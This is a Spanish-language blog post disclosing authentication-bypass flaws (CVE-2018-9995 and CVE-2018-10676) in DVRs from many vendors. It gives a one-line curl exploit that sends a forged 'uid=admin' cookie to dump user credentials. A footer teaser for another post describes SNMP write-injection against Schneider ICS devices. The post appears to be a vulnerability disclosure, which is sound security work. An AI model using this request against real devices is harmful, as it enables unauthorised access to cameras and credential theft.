[ report 2018 ] DVR (#multi)vendor ( CVE-2018-10676 ) - part 3

Ya estamos al tanto del anterior fallo que atentanta contra miles de DVR, al que le fue asignado el CVE: "CVE-2018-9995".


Fallo involucra a dispositivos de distintos vendors ( TBK Vision, Novo, CeNova, QSee, Pulnix, Securus, Night OWL, etc. )



Para dar con ellos en favor del criterio de búsqueda que apliquemos podemos llegar a mas de 50k promedio de dispositivos:

 
***







Exploit:

Explotar la vulnerabilidad es algo trivial:


 $> curl "http://{dvr_host}:{port}/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"



Una nueva vuln

Mismos dispositivos, nueva alternativa para conseguir las credenciales:


Con el "CVE-2018-9995"  había resuelto algo como lo siguiente: 




Nuevo hallazgo:  CVE-2018-10676







Saludos,
@capitan_alfa

Comentarios

Publicar un comentario

Entradas populares de este blog

[repost] MÚLTIPLES VULNERABILIDADES ( ICS ) - SCHNEIDER ELECTRIC - 6

Imagen
  Tratando con servicios SNMP, durante un tiempo me  plantee como poder 'Sacarle Jugo' a aquellos OID, con privilegios de escritura.  Y de esa inquietud nace lo que mas tarde nombre con el nombre de ' Cross Protocol Injection '. Pero de antes de hablar de Vulnerabilidades y otras hierbas, algunas aclaraciones: SNMP - WALK  & SET - Por norma general al dar con servicios SNMP con ' community ' como ' private ' nos encontraremos ante la POSIBILIDAD de setear ciertos string. En la mayoría de estos casos, se podrá editar aquellos campos  ubicados en los siguientes OID: iso.3.6.1.2.1.1.4.0   ( System Contact  )  iso.3.6.1.2.1.1.5.0   ( System Name     )  iso.3.6.1.2.1.1.6.0   ( System Location ) 
Leer más